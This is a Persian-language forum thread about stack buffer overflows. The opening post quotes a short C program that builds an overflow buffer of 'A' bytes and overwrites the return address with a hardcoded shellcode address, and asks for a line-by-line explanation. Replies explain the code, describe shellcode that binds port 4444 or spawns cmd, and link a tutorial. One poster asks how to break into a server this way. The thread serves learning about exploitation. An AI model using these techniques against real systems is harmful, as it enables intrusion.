اطلاعیه

Collapse
No announcement yet.

سرریز بافر

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • سرریز بافر

    سلام.

    بچه ها من تو این تاپیک می خوام با کمک شما درباره ی buffer overlfow اطلاعات کسب کنم .

    #include <stdio.h>
    #define RETADDR 0xbfffe2cf // Address to shellcode
    main()
    {
    char buf[1033]; // Our evil buffer
    char *p; // pointer to buf
    p = buf;
    memset(p, 0x41, 1028); // clean buffer with 'A'
    p += 1028; // This is the align of the buffer
    // 1029-1033 is the return address
    // Write return address
    *((void **)p) = (void *) (RETADDR);
    p+=4; // Jump 4 bytes because RETADDR is 4 bytes
    *p = '\0'; // Null terminate
    // Print the evil buffer
    printf("%s", buf);
    }


    بچه ها این کد رو نگاه کنید در خط دوم این 0xbfffe2cf چه معنی میده آدرس شل کد است اما چگونه آن را بدست آوردیم و به چه درد می خورد و اگه میشه خط به خط را آنالیز کنید.

    خروجی حاصل اینه که من مفهوم آن را نفهمیدم : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA

    اگه میشه خط به خط را آنالیز کنید.

  • #2
    خط اول ret آدرس رو مشخص میکنه که از یکی از dll های ویندوز میتونی به دستش بیاری.
    بعد بافر رو با سایز 1033 مشخص میکنه . char *p; // pointer to buf
    به p اشاره میکنه
    memset(p, 0x41, 1028); // clean buffer with 'A'
    به اندازه ی 1028 تا از 0x41 درون p میریزه اگه توجه کنی خط بالاش p رو برابر buffer قرار داده .
    // 1029-1033 is the return address
    خوب همونطور که میدونی ret آدرس 4 بایت هست . *((void **)p) = (void *) (RETADDR);
    p+=4; // Jump 4 bytes because RETADDR is 4 bytes
    Ret آدرس رو ست میکنه بعدش یک کانال نال در برنامه ایجاد میکنه STOP !
    خروجی حاصل اینه که من مفهوم آن را نفهمیدم
    خوب مثلا" n بایت به برنامه میده بیشتر در کار با olly به کار میده که سایز بافر رو پیدا کنی .
    فیلم !Y رو نگاه کن کاملا" متوجه میشی ( سورس + اکسپلویت + توضیح ) .

    Comment


    • #3
      دوستان من چند تا سوال مهم داشتم اگه لطف کنید جواب بدید ممنو ن میشم.
      1-کار اصلی شل کد چیه ؟
      این Return Address را می تونیم عوض کنیم ولی چه جوری یه آدرس بدیم و آن آدرس از کجا بدست آوریم وبه کجا هدایت کنیم؟
      فرض می کنیم من توی پروسه یه باگ پیدا می کنم و اکسپلویت می کنم و روس سیستم طرف اجرا می کنم و تلنت وصل می
      شوم ،نوشتن اینجور xplها چه جوریه؟
      آموزش ollydbg برای پیدا گردن باگ می خواهم ؟
      برای نوشتن اکسپلویت Socket Programming لازمه؟
      من برای اینکه از طریق سررزی پشته به یه سرور نفوذ کنم باید چیکار کنم؟
      با متا چجوری شل کد تهیه کنیم؟

      گناه ما علم ماست!!!

      Comment


      • #4
        نوشته اصلی توسط varan نمایش پست ها
        دوستان من چند تا سوال مهم داشتم اگه لطف کنید جواب بدید ممنو ن میشم.
        1-کار اصلی شل کد چیه ؟
        این Return Address را می تونیم عوض کنیم ولی چه جوری یه آدرس بدیم و آن آدرس از کجا بدست آوریم وبه کجا هدایت کنیم؟
        فرض می کنیم من توی پروسه یه باگ پیدا می کنم و اکسپلویت می کنم و روس سیستم طرف اجرا می کنم و تلنت وصل می
        شوم ،نوشتن اینجور xplها چه جوریه؟
        آموزش ollydbg برای پیدا گردن باگ می خواهم ؟
        برای نوشتن اکسپلویت Socket Programming لازمه؟
        من برای اینکه از طریق سررزی پشته به یه سرور نفوذ کنم باید چیکار کنم؟
        با متا چجوری شل کد تهیه کنیم؟

        گناه ما علم ماست!!!
        شل کد ها بايت کدهایی هستند که با دستورات سی پی يو ست شده اند. شما فکر کنم شاختار رو متوجه نشدی ! در BOF ما میونیم RET آدرس رو عوض کنیم طوری که به شلکد ما اشاره کنه خوب این شل کد میتونه مثلا" پورت 4444 رو لیسن کنه یا cmd رو drop کنه !
        متسفانه main board من سوخته ! ولی تو متا امکان نداره پیداش نکنی !
        بت گفتم ret آدرس رو میتونی از یکی از dll های ویندوز بگیری ( فیلم snake رو نگاه کن تو همین شبگرد ) .
        این مقاله هم بخون :
        کد:
        http://sc0rpion.ir/e-books/persian/BUFFER%20OVERFLOW.rar

        Comment

        Working...
        X